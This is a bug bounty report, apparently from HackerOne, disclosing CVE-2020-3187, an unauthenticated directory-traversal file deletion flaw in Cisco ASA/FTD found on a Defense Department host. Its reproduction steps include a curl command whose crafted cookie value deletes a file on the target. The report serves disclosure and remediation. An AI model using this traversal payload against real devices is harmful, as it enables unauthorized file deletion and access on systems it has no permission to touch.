Lucene search

K
hackeroneGrimnirH1:960330
HistoryAug 17, 2020 - 11:21 a.m.

U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

2020-08-1711:21:28
grimnir
hackerone.com
690

0.973 High

EPSS

Percentile

99.9%

Summary:

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.

Vulnerable Endpoint

https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ/+CSCOE+/session_password.html

Impact

An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.

Step-by-step Reproduction Instructions

1.First I performed a curl request to validate that /session_password.html gave a 200 response.

 curl -k -s -i https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ/+CSCOE+/session_password.html

2.Example to delete logo file โ€œ/+CSCOU+/csco_logo.gifโ€.

 curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ/+CSCOE+/session_password.html

NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device

Suggested Mitigation/Remediation Actions

Upgrade to the latest version of Cisco ASA or Cisco FTD.

Impact

CVSS Score: Base 9.1
Vector: CVSS:3.0/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N/E:X/RL:X/RC:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X

An unauthenticated, remote attacker can delete sensitive files located inside the webroot directory.